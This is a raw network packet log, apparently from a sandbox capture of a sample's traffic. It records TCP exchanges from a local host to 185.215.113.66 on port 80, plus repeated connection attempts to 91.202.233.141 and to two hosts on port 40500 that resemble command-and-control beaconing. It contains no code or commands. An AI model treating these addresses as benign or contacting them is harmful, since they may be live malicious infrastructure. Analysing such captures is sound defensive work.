                                                                        Apr 24, 2024 10:06:58.825197935 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825236082 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825242996 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825273037 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825280905 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825310946 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825318098 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825346947 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825356960 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825385094 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825391054 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825423002 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825443029 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825459957 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825460911 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825495005 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825500965 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825531960 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825536966 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825570107 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825573921 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825617075 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.826853991 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.826893091 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.826898098 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.826931000 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.826939106 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.826970100 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.826976061 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827008009 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827012062 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827047110 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827255964 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827300072 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827311993 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827349901 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827353954 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827394009 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827405930 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827433109 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827438116 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827470064 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827476025 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827512026 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827541113 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827578068 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827595949 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827611923 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827615023 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827652931 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.827657938 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.827693939 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:02.924985886 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:03.263219118 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:03.365341902 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:03.365443945 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:05.458800077 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:08.617115021 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:08.952084064 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:08.952265024 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:08.998130083 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.333933115 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334203959 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334244967 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334285021 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334289074 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334316015 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334323883 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334342003 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334362030 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334371090 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334403038 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334410906 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334443092 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334453106 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334490061 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334497929 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334542036 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334546089 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334579945 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.334633112 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.334640980 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.516765118 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.516783953 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669584036 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669634104 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669648886 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669672966 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669687033 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669711113 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669719934 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669759035 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669764996 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669821978 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669848919 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669887066 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669898987 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669925928 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669934034 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.669962883 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.669967890 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670001030 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670013905 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670037985 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670047045 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670079947 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670092106 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670130014 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670137882 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670167923 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670176983 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670206070 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670234919 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670244932 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670257092 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670283079 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670314074 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670320034 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670331001 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670356989 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670363903 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670396090 CEST8049713185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:09.670417070 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:09.670444965 CEST4971380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:11.563483000 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:11.864929914 CEST4971640500192.168.2.6134.35.81.188
                                                                        Apr 24, 2024 10:07:11.901458979 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:11.901621103 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:11.901932001 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.238249063 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240331888 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240355968 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240401983 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240417957 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.240461111 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240464926 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.240464926 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.240525007 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240544081 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240575075 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.240595102 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240617990 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.240659952 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.240709066 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.241719007 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.241787910 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.241789103 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.241838932 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577148914 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577210903 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577258110 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577282906 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577282906 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577300072 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577338934 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577356100 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577356100 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577383995 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577408075 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577425957 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577455997 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577464104 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577502012 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577502966 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577541113 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577549934 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577549934 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577579021 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577620029 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577636003 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577657938 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577678919 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577696085 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577698946 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577748060 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577758074 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577797890 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.577812910 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.577864885 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.578226089 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.578265905 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.578285933 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.578319073 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.578340054 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.578378916 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.578394890 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.578430891 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.861479044 CEST4971640500192.168.2.6134.35.81.188
                                                                        Apr 24, 2024 10:07:12.914660931 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.914752960 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.914760113 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.914817095 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.914848089 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.914885998 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.914901018 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.914937973 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.914941072 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.914980888 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.914997101 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915019989 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915047884 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915056944 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915069103 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915096045 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915147066 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915168047 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915208101 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915224075 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915245056 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915283918 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915297985 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915323019 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915344954 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915360928 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915414095 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.915420055 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.915479898 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916327953 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916366100 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916384935 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916410923 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916420937 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916450024 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916464090 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916490078 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916506052 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916527987 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916543007 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916582108 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916599989 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916639090 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916656017 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916677952 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916692019 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916718006 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916733027 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916757107 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916769981 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916795015 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916815042 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916832924 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916851997 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916870117 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916907072 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916934013 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.916944981 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916981936 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.916990042 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.917021036 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.917030096 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.917057991 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.917073965 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.917095900 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.917135000 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.917150021 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.917170048 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:12.917201996 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:12.917296886 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:14.861449957 CEST4971640500192.168.2.6134.35.81.188
                                                                        Apr 24, 2024 10:07:18.861498117 CEST4971640500192.168.2.6134.35.81.188
                                                                        Apr 24, 2024 10:07:19.066494942 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:19.402990103 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:19.403055906 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:19.403207064 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:21.425288916 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:21.761950016 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:21.762011051 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:21.762166023 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:23.785530090 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:24.121994019 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:24.122106075 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:24.122208118 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:26.144078016 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:26.483851910 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:26.484044075 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:26.861434937 CEST4971640500192.168.2.6134.35.81.188
                                                                        Apr 24, 2024 10:07:28.788214922 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:29.124979019 CEST8049714185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:07:29.125123978 CEST4971480192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:07:32.162642002 CEST4972380192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:32.508780956 CEST804972391.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:33.017771959 CEST4972380192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:33.363862038 CEST804972391.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:33.877089977 CEST4972380192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:34.253700018 CEST804972391.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:34.767756939 CEST4972380192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:35.113948107 CEST804972391.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:35.627123117 CEST4972380192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:35.973366022 CEST804972391.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:37.862560987 CEST4972440500192.168.2.6109.72.204.86
                                                                        Apr 24, 2024 10:07:38.003740072 CEST4972580192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:38.349050045 CEST804972591.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:38.861598015 CEST4972580192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:38.877095938 CEST4972440500192.168.2.6109.72.204.86
                                                                        Apr 24, 2024 10:07:39.207465887 CEST804972591.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:39.720820904 CEST4972580192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:40.063611031 CEST804972591.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:40.564591885 CEST4972580192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:40.877088070 CEST4972440500192.168.2.6109.72.204.86
                                                                        Apr 24, 2024 10:07:40.907285929 CEST804972591.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:41.411431074 CEST4972580192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:41.755108118 CEST804972591.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:43.788923025 CEST4972780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:44.133971930 CEST804972791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:44.642710924 CEST4972780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:44.877124071 CEST4972440500192.168.2.6109.72.204.86
                                                                        Apr 24, 2024 10:07:44.990495920 CEST804972791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:45.502082109 CEST4972780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:45.850939035 CEST804972791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:46.361453056 CEST4972780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:46.706427097 CEST804972791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:47.220952034 CEST4972780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:47.565632105 CEST804972791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:49.597753048 CEST4972880192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:49.944511890 CEST804972891.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:50.455239058 CEST4972880192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:50.802321911 CEST804972891.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:51.314696074 CEST4972880192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:51.664055109 CEST804972891.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:52.174046993 CEST4972880192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:52.521591902 CEST804972891.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:52.877089977 CEST4972440500192.168.2.6109.72.204.86
                                                                        Apr 24, 2024 10:07:53.033370972 CEST4972880192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:53.379940987 CEST804972891.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:07:55.410269976 CEST4973080192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:07:55.761173964 CEST804973091.202.233.141192.168.2.6
